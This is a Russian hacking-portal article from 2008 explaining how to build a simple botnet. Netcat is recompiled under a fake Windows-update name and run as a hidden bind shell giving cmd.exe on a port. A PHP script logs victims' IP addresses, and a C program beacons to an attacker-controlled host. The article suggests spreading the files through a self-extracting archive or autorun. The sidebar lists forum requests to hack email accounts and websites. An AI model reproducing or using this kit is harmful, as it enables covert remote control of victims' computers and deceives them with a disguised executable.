CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Ботнет из подручных средств
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Ботнет из подручных средств

12.12.2008

Начнем
Все знают, что такое неткат(netcat):
wiki: "netcat (англ. net сеть + cat) — утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Несмотря на свою простоту, данная утилита не входит ни в какой стандарт (например, POSIX)."
Есть у него очень полезные аргументы, например:
-L прослушивание порта
-p прослушиваемый порт
-d скрытый режим
-e <exe_file> - запуск exe_file
Таким образом, выполнив команду:
1
netcat.exe -d -l -p 6666 -e cmd.exe

мы запустим "прослушку" 6666го порта, с последующим запуском cmd.exe. Т.е. мы получим шелл.
Это всем известно, ничего нового. Так почему бы нам не попробовать использовать ее в качестве бот-сервера?
*Примечание: никаких способов скрыться от антивирусов/фаеров/etc тут не будет*
Итак, поехали!

  1. Нам нужен хостинг, с поддержкой php. Создаем php-файл следующего содержимого:
    1
    2
    3
     <?php
    file_put_contents("ip.txt", $_SERVER["REMOTE_ADDR"]."\n", FILE_APPEND);
    ?>

    будем писать в файл все ремоут-ИПы. Кидаем на серв, выставляем права. Допустим, что наш урл выглядит так:
    www.some_host.ru/ip.php
    Все, с этим закончили.

  2. Качаем исходники netcat. Компилируем его с именем, которое не будет вызывать подозрение(например, winupd32.exe).

  3. Теперь нам нужно _что_то_, что будет сообщать нам об ИПах. Тут ничего сложного.
    Пишем софтинку, которая просто будет коннектиться на www.some_host.ru/ip.php, естественно коннект должен быть от юзера.
    Код простой:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    #include <stdio.h>
    #include <stdlib.h>
    #include <winsock.h>
     
    #pragma comment(lib, "ws2_32.lib")
     
    #define ADDR "0.0.0.0" /* Тут ИП нашего www.some_host.ru/ip.php */
    #define PORT 80
     
    int main(int argc, char *argv[])
    {
    SOCKET sd;
    WSADATA wsa;
     
    int con, rc;
    struct sockaddr_in net;
    char buf[255];
    char s[] = "GET http://some_host.ru/ip.php HTTP/1.1\r\nHost: some_host.ru\r\n\r\n";
     
    WSAStartup(0x0101, &wsa);
    memset(&buf, 0, sizeof(buf));
    net.sin_family = AF_INET;
    net.sin_port = htons(PORT);
    net.sin_addr.s_addr = inet_addr(ADDR);
     
    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd < 0)
    exit(1);
    con = connect(sd, (struct sockaddr *) &net, sizeof(net));
    if(con)
    exit(1);
    con = send(sd, s, sizeof(s), 0);
    if(con <= 0)
    exit(1);
    closesocket(sd);
    return 0;
    }


Вот и все. Основная часть готова. Тут много чего добавить можно - и запись в реестр, и проверку наличия сети и т.д. Дело фантазии.
Скомпилировать не забудьте.
Теперь остается запустить неткат, с нужными параметрами, запустить нашу "стучалку" и все. "Клиент готов" (c)

Разберемся с запуском. Тут вариантов много: либо мы создаем sfx-архив, который будет все это запускать, либо мы суем все это в авторан.
Или же можно сделать так: распаковываем файлы, затем запускаем неткат нашей стучалкой, добавив, например, такую строчку:
1
CreateProcess(NULL, "winupd32.exe -d -L -p 65535 -e cmd.exe", ..., ...);

Результат работы будет тут:
http://some_host.ru/ip.txt
Хм...вроде все.

Линки:
http://netcat.sourceforge.net/
http://www.intuit.ru/department/security/issec/1/
Благоданости: Zarin и всем, кто тестил.

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Вирусы и спам
Опубликовал: RenGO
Просмотров: 17629
Проголосовало через SMS: 0
Ключевые слова: netcat, botnet, bot, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Mobile / Средства связи » Взлом вашей второй Половинки - lightning.hacking@gmail.com
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Разное » Взлом вашей второй Половинки - lightning.hacking@gmail.com
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com
  • Разное / Предложения работы » Re: Зайти на сайт из под Администратора + публикация статьи
  • Взлом и безопасность / WEB сайтов » Брутс для 2fa биржи

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}